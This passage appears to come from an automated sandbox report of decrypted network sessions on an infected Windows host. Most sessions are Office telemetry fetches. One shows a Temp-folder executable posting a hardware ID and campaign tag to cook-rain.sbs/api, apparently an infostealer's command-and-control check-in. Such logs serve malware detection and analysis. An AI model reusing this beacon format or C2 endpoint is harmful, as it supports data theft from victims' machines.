                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e7fe902a-801e-0067-6164-3bfe30000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111043Z-178bfbc474b9fdhphC1NYCac0n00000001c00000000046zd
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            104192.168.2.44984913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111043Z-178bfbc474bq2pr7hC1NYCkfgg00000001ng000000000gtq
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            105192.168.2.44985113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: dcdb4efb-f01e-001f-7bc1-3b5dc8000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111043Z-r1d97b9957789nh9hC1TEBxha80000000adg000000006dpk
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            106192.168.2.44985313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c780bae6-901e-005b-04c5-3b2005000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111043Z-1777c6cb754ww792hC1TEBzqu40000000arg00000000g0uv
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            107192.168.2.44985213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:44 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 5a6b30d1-101e-00a2-7c5b-3b9f2e000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111044Z-178bfbc474bwh9gmhC1NYCy3rs00000001d000000000af7q
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            108192.168.2.449855188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=72DFR209WNHHRYSC
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 1273
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC1273OUTData Raw: 2d 2d 37 32 44 46 52 32 30 39 57 4e 48 48 52 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 37 32 44 46 52 32 30 39 57 4e 48 48 52 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 32 44 46 52 32 30 39 57 4e 48 48 52 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                                                                                                                                            Data Ascii: --72DFR209WNHHRYSCContent-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--72DFR209WNHHRYSCContent-Disposition: form-data; name="pid"1--72DFR209WNHHRYSCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC985INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:45 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=p66h36plq2rng2pcoi3jr45hfo; expires=Mon, 17-Mar-2025 04:57:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7cbK8VSgReq%2BCVZUZq4i9B3iprmZ75%2BSbtG1tBtsR2FmNCjVBNZR%2FB0%2BhCQTHdWrl6dhD5JgdQnO9Mp8CPENYMCu2EbDphLsVxn9%2BUMYzv6bMzIRWh0gzQD8TdU57ImX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c2add0a438a-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2073&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2185&delivery_rate=1393129&cwnd=205&unsent_bytes=0&cid=3b82633f35b7a3a3&ts=963&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            109192.168.2.44985413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:44 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:45 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 6d560277-a01e-0050-158c-3adb6e000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111045Z-1777c6cb754rz2pghC1TEBghen0000000awg000000009rx5
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            110192.168.2.44985613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:45 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111045Z-178bfbc474bwh9gmhC1NYCy3rs00000001dg00000000a24a
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            111192.168.2.44985713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:46 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 44ceed99-901e-0064-727b-3be8a6000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
